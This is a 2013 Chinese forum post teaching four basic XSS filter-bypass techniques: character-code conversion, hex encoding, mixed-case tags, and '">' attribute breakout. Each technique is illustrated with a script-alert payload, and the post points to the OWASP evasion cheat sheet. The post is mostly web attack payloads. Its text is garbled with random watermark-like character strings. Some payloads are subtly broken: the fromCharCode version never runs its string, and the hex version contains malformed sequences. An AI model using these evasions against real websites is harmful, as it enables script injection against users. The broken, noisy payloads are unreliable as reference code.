找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2051|回复: 0
打印 上一主题 下一主题

XSS 绕过技术

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:10:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
四种超级基础的绕过方法。
. W; s8 y5 A2 J" ~) @+ N" r1.转换为ASCII码! Z+ T) ?  p2 ?. I6 g
例子:原脚本为<script>alert(‘I love F4ck’)</script >% i2 f4 t' C' S
通过转换,变成:
. R; z& F( y* [<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>) q) b3 o: h4 R# b$ q

8 P! _6 _8 \1 T  o. ?2.转换为HEX(十六进制)
& l* U1 n9 G! i* D' J9 t+ h' f例子:原脚本为<script>alert(‘I love F4ck’)</script>
+ Y1 x) O  H8 B: ^# T7 D通过转换,变成:
  h% K) B' h0 F  t0 @: n$ D/ v%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e6 Q% U+ o$ f" O) G1 j& g

! ?- q2 `/ D7 }/ Y/ p3.转换脚本的大小写+ }2 N& f# a$ G2 b- e' I3 f
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( d( g; b+ Q4 I转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>$ f' d" r& f8 S. J
$ f8 f5 O1 q" S
4.增加闭合标记”>
' @2 u4 U$ b* T0 ?0 T* P例子:原脚本为<script>alert(‘I love F4ck’)</script>8 p2 F; o# ?: c) U- `& j& i, f
转换为:”><script>alert(‘I love F4ck’)</script>
* `& u  X! Z) @更详细绕过技术请参考此网页
- S5 X  f3 W! g6 g% ]https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet/ e5 S( T/ c0 D
1 M) p8 e" _4 e2 {% r7 M
转换工具使用的是火狐的 hackbar mozilla addon.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表